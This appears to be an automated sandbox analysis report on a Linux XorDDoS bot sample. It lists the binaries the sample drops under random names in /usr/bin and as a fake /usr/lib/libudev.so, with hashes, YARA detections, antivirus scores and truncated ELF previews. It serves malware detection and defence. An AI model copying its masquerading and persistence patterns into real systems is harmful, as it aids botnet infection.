Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/jflhtagbsg, Author: Joe Security Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/jflhtagbsg, Author: ditekSHen Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/jflhtagbsg, Author: Akamai CSIRT Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/jflhtagbsg, Author: unknown Rule: Linux_Trojan_Xorddos_0eb147ca, Description: unknown, Source: /usr/bin/jflhtagbsg, Author: unknown Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/jflhtagbsg, Author: unknown Rule: Linux_Trojan_Xorddos_ba961ed2, Description: unknown, Source: /usr/bin/jflhtagbsg, Author: unknown Rule: Linux_Trojan_Xorddos_2084099a, Description: unknown, Source: /usr/bin/jflhtagbsg, Author: unknown
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	.ELF........................4...hq......4. ...(.....................k`..k`..............l`..l...l........r........................ ... ...............l`..l...l.......@...........Q.td........................................GNU.................U.....5....................1.^....PTRhpP..h.P..QVh............U..S........[..o..........t..~..X[.......U..S....=$....uT.....-........X.. ...9.v...&........ ........... ...9.w.......t...$\~.........$.......[]......U.0............Z...n....t .T$..D$......D$.(.....$\~...%..........t........t...$........U.....E..D$..E..D$..E...$......E..D$..E...$...........U...(.E.....D$..E..D$...$........E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$....)....E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.....E..D$..D$..+...D$.............$.;....E.....D$..E..D$.........$.....E..}..x..E....;E...............E..E.....E...............U..W.....

/usr/bin/oklqvchkds

Download File

Process:	/tmp/fuck.elf
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
Category:	dropped
Size (bytes):	625718
Entropy (8bit):	6.242845619281837
Encrypted:	false
SSDEEP:	12288:UB1tATMVAqnf+ExxBHYpmA38X8LYkCW6Ti4x6yB1/iGK4UlUuTh1An:UB1BVpmExDYp38X8LYTWh4fNiGQl/91O
MD5:	56EB989FAEC3C2AB2A2AFBAEC7EA40EB
SHA1:	A5929215AFA4C3DD40151426FDB2EA8933962B79
SHA-256:	822DB79E383250E3DB211928584FB10275C303BF1D19B17940C9C9C47B9BAB3E
SHA-512:	7310F59E08ECFC9247D8839EAEB6518037FFB63A640CA681942D48EF11F2124B8DF62BAD5506EDBFAFFCD7C109C16685464F2CCB289B1FDFFFF3EA20686788BF
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/oklqvchkds, Author: Joe Security Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/oklqvchkds, Author: ditekSHen Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/oklqvchkds, Author: Akamai CSIRT Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/oklqvchkds, Author: unknown Rule: Linux_Trojan_Xorddos_0eb147ca, Description: unknown, Source: /usr/bin/oklqvchkds, Author: unknown Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/oklqvchkds, Author: unknown Rule: Linux_Trojan_Xorddos_ba961ed2, Description: unknown, Source: /usr/bin/oklqvchkds, Author: unknown Rule: Linux_Trojan_Xorddos_2084099a, Description: unknown, Source: /usr/bin/oklqvchkds, Author: unknown
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	.ELF........................4...hq......4. ...(.....................k`..k`..............l`..l...l........r........................ ... ...............l`..l...l.......@...........Q.td........................................GNU.................U.....5....................1.^....PTRhpP..h.P..QVh............U..S........[..o..........t..~..X[.......U..S....=$....uT.....-........X.. ...9.v...&........ ........... ...9.w.......t...$\~.........$.......[]......U.0............Z...n....t .T$..D$......D$.(.....$\~...%..........t........t...$........U.....E..D$..E..D$..E...$......E..D$..E...$...........U...(.E.....D$..E..D$...$........E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$....)....E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.....E..D$..D$..+...D$.............$.;....E.....D$..E..D$.........$.....E..}..x..E....;E...............E..E.....E...............U..W.....

/usr/bin/pzvxnaaphf

Download File

Process:	/tmp/fuck.elf
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
Category:	dropped
Size (bytes):	610304
Entropy (8bit):	6.208422310930975
Encrypted:	false
SSDEEP:	12288:UB1tATMVAqnf+ExxBHYpmA38X8LYkCW6Ti4x6yB1/iGK4Ulo:UB1BVpmExDYp38X8LYTWh4fNiGQlo
MD5:	03D196F96EB4003D37E90B79FE83EC2F
SHA1:	F62EB92688598C3E9D3FFCE1782B115223C8507A
SHA-256:	1B679B8A127D8E16521C9604B7D2061128BE92D0616AB56AEC9E36F2008624E1
SHA-512:	DA8C340E1D3EF3060F2A8997B7408EA795A8D729F7A2CE0E6CAE4A2045B41FE414A5F1A3F7419E0B3F9FBF7D635B3514816F024D130B89495BB0621183E61FBB
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/pzvxnaaphf, Author: Joe Security Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/pzvxnaaphf, Author: ditekSHen Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/pzvxnaaphf, Author: unknown Rule: Linux_Trojan_Xorddos_0eb147ca, Description: unknown, Source: /usr/bin/pzvxnaaphf, Author: unknown Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/pzvxnaaphf, Author: unknown Rule: Linux_Trojan_Xorddos_ba961ed2, Description: unknown, Source: /usr/bin/pzvxnaaphf, Author: unknown Rule: Linux_Trojan_Xorddos_2084099a, Description: unknown, Source: /usr/bin/pzvxnaaphf, Author: unknown
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	.ELF........................4...hq......4. ...(.....................k`..k`..............l`..l...l........r........................ ... ...............l`..l...l.......@...........Q.td........................................GNU.................U.....5....................1.^....PTRhpP..h.P..QVh............U..S........[..o..........t..~..X[.......U..S....=$....uT.....-........X.. ...9.v...&........ ........... ...9.w.......t...$\~.........$.......[]......U.0............Z...n....t .T$..D$......D$.(.....$\~...%..........t........t...$........U.....E..D$..E..D$..E...$......E..D$..E...$...........U...(.E.....D$..E..D$...$........E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$....)....E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.....E..D$..D$..+...D$.............$.;....E.....D$..E..D$.........$.....E..}..x..E....;E...............E..E.....E...............U..W.....

/usr/bin/sanzuhhixf

Download File

Process:	/tmp/fuck.elf
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
Category:	dropped
Size (bytes):	625718
Entropy (8bit):	6.242854168087148
Encrypted:	false
SSDEEP:	12288:UB1tATMVAqnf+ExxBHYpmA38X8LYkCW6Ti4x6yB1/iGK4UlUuTh1AD:UB1BVpmExDYp38X8LYTWh4fNiGQl/91q
MD5:	20020D772DE3B4A641DA0272B36F3272
SHA1:	458F3E6A5862E340AEE48ACFBD6AB70B21111B38
SHA-256:	4C60FBB0F7DC952C48625D18582B10B5CC12F9D96FA07802EE7E26592A5C94FD
SHA-512:	549FD0D73E989C048624A4E6774C4605FDC7C3C8DB6163EB4000C6FE0BE21392C9A419473C813C791C0009CBBFFA57D09CC0524FCE22218903AEB5CD657AC22A
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/sanzuhhixf, Author: Joe Security Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/sanzuhhixf, Author: ditekSHen Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/sanzuhhixf, Author: Akamai CSIRT Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/sanzuhhixf, Author: unknown Rule: Linux_Trojan_Xorddos_0eb147ca, Description: unknown, Source: /usr/bin/sanzuhhixf, Author: unknown Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/sanzuhhixf, Author: unknown Rule: Linux_Trojan_Xorddos_ba961ed2, Description: unknown, Source: /usr/bin/sanzuhhixf, Author: unknown Rule: Linux_Trojan_Xorddos_2084099a, Description: unknown, Source: /usr/bin/sanzuhhixf, Author: unknown
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	.ELF........................4...hq......4. ...(.....................k`..k`..............l`..l...l........r........................ ... ...............l`..l...l.......@...........Q.td........................................GNU.................U.....5....................1.^....PTRhpP..h.P..QVh............U..S........[..o..........t..~..X[.......U..S....=$....uT.....-........X.. ...9.v...&........ ........... ...9.w.......t...$\~.........$.......[]......U.0............Z...n....t .T$..D$......D$.(.....$\~...%..........t........t...$........U.....E..D$..E..D$..E...$......E..D$..E...$...........U...(.E.....D$..E..D$...$........E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$....)....E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.....E..D$..D$..+...D$.............$.;....E.....D$..E..D$.........$.....E..}..x..E....;E...............E..E.....E...............U..W.....

/usr/bin/ujuhiugmmi

Download File

Process:	/tmp/fuck.elf
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
Category:	dropped
Size (bytes):	625718
Entropy (8bit):	6.242842957141291
Encrypted:	false
SSDEEP:	12288:UB1tATMVAqnf+ExxBHYpmA38X8LYkCW6Ti4x6yB1/iGK4UlUuTh1A+:UB1BVpmExDYp38X8LYTWh4fNiGQl/91b
MD5:	3BF5A8180C278833DC913E174DE19BA4
SHA1:	566E2C3A0F1F9C41C70BCD5528401243B2E02C7A
SHA-256:	C66F3A41A0EF400E2E4E796BE042CA355129CBAC535570FD224956D463308487
SHA-512:	8C46279EEBC5528572A47F21AE01AEBC49755145FE5B2634DFCFDAEBDFA3189E485A1A08DBFDFD365EEA15197A631863FBFA4FAE273DF9EF9E3084B24E236518
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/ujuhiugmmi, Author: Joe Security Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/ujuhiugmmi, Author: ditekSHen Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/ujuhiugmmi, Author: Akamai CSIRT Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/ujuhiugmmi, Author: unknown Rule: Linux_Trojan_Xorddos_0eb147ca, Description: unknown, Source: /usr/bin/ujuhiugmmi, Author: unknown Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/ujuhiugmmi, Author: unknown Rule: Linux_Trojan_Xorddos_ba961ed2, Description: unknown, Source: /usr/bin/ujuhiugmmi, Author: unknown Rule: Linux_Trojan_Xorddos_2084099a, Description: unknown, Source: /usr/bin/ujuhiugmmi, Author: unknown
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	.ELF........................4...hq......4. ...(.....................k`..k`..............l`..l...l........r........................ ... ...............l`..l...l.......@...........Q.td........................................GNU.................U.....5....................1.^....PTRhpP..h.P..QVh............U..S........[..o..........t..~..X[.......U..S....=$....uT.....-........X.. ...9.v...&........ ........... ...9.w.......t...$\~.........$.......[]......U.0............Z...n....t .T$..D$......D$.(.....$\~...%..........t........t...$........U.....E..D$..E..D$..E...$......E..D$..E...$...........U...(.E.....D$..E..D$...$........E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$....)....E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.....E..D$..D$..+...D$.............$.;....E.....D$..E..D$.........$.....E..}..x..E....;E...............E..E.....E...............U..W.....

/usr/bin/wjnxqdxblo

Download File

Process:	/tmp/fuck.elf
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
Category:	dropped
Size (bytes):	625718
Entropy (8bit):	6.242849256360091
Encrypted:	false
SSDEEP:	12288:UB1tATMVAqnf+ExxBHYpmA38X8LYkCW6Ti4x6yB1/iGK4UlUuTh1AZ:UB1BVpmExDYp38X8LYTWh4fNiGQl/91o
MD5:	DF30F28270F8C66AC8E73C3FEBE841CD
SHA1:	59E7FCC2925E91D52419BCEC1ACDA1DF3C362E2A
SHA-256:	33977E1F1842B4142B0A480CCECF611F9CD724FE244E71797EB0202606C71084
SHA-512:	5EA9D65AC5D6FDE65A08EBC1471EA5C75F1E37B30EC10703B0E66FBFEEFC1460DF61AC82F784D9A485B87C15E746A5E90CFF848F713170ECFFC9995A4B5FF882
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/wjnxqdxblo, Author: Joe Security Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/wjnxqdxblo, Author: ditekSHen Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/wjnxqdxblo, Author: Akamai CSIRT Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/wjnxqdxblo, Author: unknown Rule: Linux_Trojan_Xorddos_0eb147ca, Description: unknown, Source: /usr/bin/wjnxqdxblo, Author: unknown Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/wjnxqdxblo, Author: unknown Rule: Linux_Trojan_Xorddos_ba961ed2, Description: unknown, Source: /usr/bin/wjnxqdxblo, Author: unknown Rule: Linux_Trojan_Xorddos_2084099a, Description: unknown, Source: /usr/bin/wjnxqdxblo, Author: unknown
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	.ELF........................4...hq......4. ...(.....................k`..k`..............l`..l...l........r........................ ... ...............l`..l...l.......@...........Q.td........................................GNU.................U.....5....................1.^....PTRhpP..h.P..QVh............U..S........[..o..........t..~..X[.......U..S....=$....uT.....-........X.. ...9.v...&........ ........... ...9.w.......t...$\~.........$.......[]......U.0............Z...n....t .T$..D$......D$.(.....$\~...%..........t........t...$........U.....E..D$..E..D$..E...$......E..D$..E...$...........U...(.E.....D$..E..D$...$........E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$....)....E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.....E..D$..D$..+...D$.............$.;....E.....D$..E..D$.........$.....E..}..x..E....;E...............E..E.....E...............U..W.....

/usr/bin/xocmdvejxu

Download File

Process:	/tmp/fuck.elf
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
Category:	dropped
Size (bytes):	625718
Entropy (8bit):	6.242851421074807
Encrypted:	false
SSDEEP:	12288:UB1tATMVAqnf+ExxBHYpmA38X8LYkCW6Ti4x6yB1/iGK4UlUuTh1Af:UB1BVpmExDYp38X8LYTWh4fNiGQl/91+
MD5:	6D859DDF2B3DD9E23E5C6A3AE4ECFBFF
SHA1:	24A399BCB462FA6FB607F525A6ED16648C907C80
SHA-256:	7C3A3E129FF8A5EDD16DD021E392EA496A69EC5807F7945CA69D398E903692EE
SHA-512:	966803432BD69F7657B039BC99C153A8A68E7F6044C9B6004C783054355E83E56F83EB7FA0935FB2CDF216CC42EF13196C4910924238E4E55485C4EE54C6BA9E
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/xocmdvejxu, Author: Joe Security Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/xocmdvejxu, Author: ditekSHen Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/xocmdvejxu, Author: Akamai CSIRT Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/xocmdvejxu, Author: unknown Rule: Linux_Trojan_Xorddos_0eb147ca, Description: unknown, Source: /usr/bin/xocmdvejxu, Author: unknown Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/xocmdvejxu, Author: unknown Rule: Linux_Trojan_Xorddos_ba961ed2, Description: unknown, Source: /usr/bin/xocmdvejxu, Author: unknown Rule: Linux_Trojan_Xorddos_2084099a, Description: unknown, Source: /usr/bin/xocmdvejxu, Author: unknown
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	.ELF........................4...hq......4. ...(.....................k`..k`..............l`..l...l........r........................ ... ...............l`..l...l.......@...........Q.td........................................GNU.................U.....5....................1.^....PTRhpP..h.P..QVh............U..S........[..o..........t..~..X[.......U..S....=$....uT.....-........X.. ...9.v...&........ ........... ...9.w.......t...$\~.........$.......[]......U.0............Z...n....t .T$..D$......D$.(.....$\~...%..........t........t...$........U.....E..D$..E..D$..E...$......E..D$..E...$...........U...(.E.....D$..E..D$...$........E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$....)....E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.....E..D$..D$..+...D$.............$.;....E.....D$..E..D$.........$.....E..}..x..E....;E...............E..E.....E...............U..W.....

/usr/bin/xodlvzjoas

Download File

Process:	/tmp/fuck.elf
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
Category:	dropped
Size (bytes):	625718
Entropy (8bit):	6.2428523878957725
Encrypted:	false
SSDEEP:	12288:UB1tATMVAqnf+ExxBHYpmA38X8LYkCW6Ti4x6yB1/iGK4UlUuTh1Ag:UB1BVpmExDYp38X8LYTWh4fNiGQl/91B
MD5:	DFD3D04BBF2779FABBEF0FEC22258C2E
SHA1:	964D09084DF34D7DF29FC71C1DDDE76CFC8A224E
SHA-256:	FF93B66199A4FB594DAE7A43650171517759C7E4CF961DD4714CBA05769D6D3A
SHA-512:	5BEC5846D83CF739F8367113F61432A93B5B04804CCD8933AED49C482B2D0074F561FA5587651AD09EE3F83D4D75CC007B1F67045BDE30441077118985E125B0
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/xodlvzjoas, Author: Joe Security Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/xodlvzjoas, Author: ditekSHen Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/xodlvzjoas, Author: Akamai CSIRT Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/xodlvzjoas, Author: unknown Rule: Linux_Trojan_Xorddos_0eb147ca, Description: unknown, Source: /usr/bin/xodlvzjoas, Author: unknown Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/xodlvzjoas, Author: unknown Rule: Linux_Trojan_Xorddos_ba961ed2, Description: unknown, Source: /usr/bin/xodlvzjoas, Author: unknown Rule: Linux_Trojan_Xorddos_2084099a, Description: unknown, Source: /usr/bin/xodlvzjoas, Author: unknown
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	.ELF........................4...hq......4. ...(.....................k`..k`..............l`..l...l........r........................ ... ...............l`..l...l.......@...........Q.td........................................GNU.................U.....5....................1.^....PTRhpP..h.P..QVh............U..S........[..o..........t..~..X[.......U..S....=$....uT.....-........X.. ...9.v...&........ ........... ...9.w.......t...$\~.........$.......[]......U.0............Z...n....t .T$..D$......D$.(.....$\~...%..........t........t...$........U.....E..D$..E..D$..E...$......E..D$..E...$...........U...(.E.....D$..E..D$...$........E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$....)....E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.....E..D$..D$..+...D$.............$.;....E.....D$..E..D$.........$.....E..}..x..E....;E...............E..E.....E...............U..W.....

/usr/bin/zfyjfaoiow

Download File

Process:	/tmp/fuck.elf
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
Category:	dropped
Size (bytes):	625718
Entropy (8bit):	6.242841817730652
Encrypted:	false
SSDEEP:	12288:UB1tATMVAqnf+ExxBHYpmA38X8LYkCW6Ti4x6yB1/iGK4UlUuTh1Ad:UB1BVpmExDYp38X8LYTWh4fNiGQl/91o
MD5:	E87CEADB8A4E38E1D33A543F1EF6F174
SHA1:	980217B6E285322ED6AA26154BCD66F93A114F27
SHA-256:	B2DAC523424FCB9F465DF0645521E07EEB74FB9E173B6861ADED2D607A59CC4B
SHA-512:	61A409DD630B0A680B34934B57BF463981210523F06643FD14176A1B350393F576E11844BB77B7DF98C41BF78F9593898C1E2D39726353F7AE4899C292258C75
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/zfyjfaoiow, Author: Joe Security Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/zfyjfaoiow, Author: ditekSHen Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/zfyjfaoiow, Author: Akamai CSIRT Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/zfyjfaoiow, Author: unknown Rule: Linux_Trojan_Xorddos_0eb147ca, Description: unknown, Source: /usr/bin/zfyjfaoiow, Author: unknown Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/zfyjfaoiow, Author: unknown Rule: Linux_Trojan_Xorddos_ba961ed2, Description: unknown, Source: /usr/bin/zfyjfaoiow, Author: unknown Rule: Linux_Trojan_Xorddos_2084099a, Description: unknown, Source: /usr/bin/zfyjfaoiow, Author: unknown
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	.ELF........................4...hq......4. ...(.....................k`..k`..............l`..l...l........r........................ ... ...............l`..l...l.......@...........Q.td........................................GNU.................U.....5....................1.^....PTRhpP..h.P..QVh............U..S........[..o..........t..~..X[.......U..S....=$....uT.....-........X.. ...9.v...&........ ........... ...9.w.......t...$\~.........$.......[]......U.0............Z...n....t .T$..D$......D$.(.....$\~...%..........t........t...$........U.....E..D$..E..D$..E...$......E..D$..E...$...........U...(.E.....D$..E..D$...$........E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$....)....E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.....E..D$..D$..+...D$.............$.;....E.....D$..E..D$.........$.....E..}..x..E....;E...............E..E.....E...............U..W.....

/usr/bin/zkleyiegjf

Download File

Process:	/tmp/fuck.elf
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
Category:	dropped
Size (bytes):	625718
Entropy (8bit):	6.242850764831871
Encrypted:	false
SSDEEP:	12288:UB1tATMVAqnf+ExxBHYpmA38X8LYkCW6Ti4x6yB1/iGK4UlUuTh1Ar:UB1BVpmExDYp38X8LYTWh4fNiGQl/91e
MD5:	F6B5753A34AFF292E6ECB9853B898493
SHA1:	31CCAC00C2AC6FADC3418383F0664C8767864402
SHA-256:	5F73B6795843506EB809A6715F169E3A927F0840AA2928AD1483BCD6D8870CB1
SHA-512:	7136A0D7FF874F3D24DDFEB7ABA616CA46CE671152D3B0413326361AF0C0136AE173F498BA50EB15057E2C959239CA9DBA39FAE5B20386C7A1B2D30346BA5388
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/zkleyiegjf, Author: Joe Security Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/zkleyiegjf, Author: ditekSHen Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/zkleyiegjf, Author: Akamai CSIRT Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/zkleyiegjf, Author: unknown Rule: Linux_Trojan_Xorddos_0eb147ca, Description: unknown, Source: /usr/bin/zkleyiegjf, Author: unknown Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/zkleyiegjf, Author: unknown Rule: Linux_Trojan_Xorddos_ba961ed2, Description: unknown, Source: /usr/bin/zkleyiegjf, Author: unknown Rule: Linux_Trojan_Xorddos_2084099a, Description: unknown, Source: /usr/bin/zkleyiegjf, Author: unknown
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	.ELF........................4...hq......4. ...(.....................k`..k`..............l`..l...l........r........................ ... ...............l`..l...l.......@...........Q.td........................................GNU.................U.....5....................1.^....PTRhpP..h.P..QVh............U..S........[..o..........t..~..X[.......U..S....=$....uT.....-........X.. ...9.v...&........ ........... ...9.w.......t...$\~.........$.......[]......U.0............Z...n....t .T$..D$......D$.(.....$\~...%..........t........t...$........U.....E..D$..E..D$..E...$......E..D$..E...$...........U...(.E.....D$..E..D$...$........E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$....)....E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.....E..D$..D$..+...D$.............$.;....E.....D$..E..D$.........$.....E..}..x..E....;E...............E..E.....E...............U..W.....

/usr/lib/libudev.so

Download File

Process:	/tmp/fuck.elf
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
Category:	dropped
Size (bytes):	625707
Entropy (8bit):	6.242814659945082
Encrypted:	false
SSDEEP:	12288:UB1tATMVAqnf+ExxBHYpmA38X8LYkCW6Ti4x6yB1/iGK4UlUuTh1AG:UB1BVpmExDYp38X8LYTWh4fNiGQl/91h
MD5:	EE5EDCC4D824DB63A8C8264A8631F067
SHA1:	CE483E6B254CC3ED3EDE2E1FEE3F959CC4EDDBE8
SHA-256:	B84CF164FDE12DD07192AA44F1B943044610539FD979E0F9359D44062F21A612
SHA-512:	4A3B98BBEA252E8980FC4133EB026A6C673313C6B92A6FC865481C79321CDF24446F651973EFBF01FE06794D397D076ACCEDF99B07DA0C08D32D3FA4E382BC54
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/lib/libudev.so, Author: Joe Security Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/lib/libudev.so, Author: ditekSHen Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/lib/libudev.so, Author: Akamai CSIRT Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/lib/libudev.so, Author: unknown Rule: Linux_Trojan_Xorddos_0eb147ca, Description: unknown, Source: /usr/lib/libudev.so, Author: unknown Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/lib/libudev.so, Author: unknown Rule: Linux_Trojan_Xorddos_ba961ed2, Description: unknown, Source: /usr/lib/libudev.so, Author: unknown Rule: Linux_Trojan_Xorddos_2084099a, Description: unknown, Source: /usr/lib/libudev.so, Author: unknown
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	.ELF........................4...hq......4. ...(.....................k`..k`..............l`..l...l........r........................ ... ...............l`..l...l.......@...........Q.td........................................GNU.................U.....5....................1.^....PTRhpP..h.P..QVh............U..S........[..o..........t..~..X[.......U..S....=$....uT.....-........X.. ...9.v...&........ ........... ...9.w.......t...$\~.........$.......[]......U.0............Z...n....t .T$..D$......D$.(.....$\~...%..........t........t...$........U.....E..D$..E..D$..E...$......E..D$..E...$...........U...(.E.....D$..E..D$...$........E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$....)....E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.....E..D$..D$..+...D$.............$.;....E.....D$..E..D$.........$.....E..}..x..E....;E...............E..E.....E...............U..W.....

Static File Info

General

File type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
Entropy (8bit):	6.242814659945082
TrID:	ELF Executable and Linkable format (Linux) (4029/14) 50.16% ELF Executable and Linkable format (generic) (4004/1) 49.84%
File name:	fuck.elf
File size:	625707
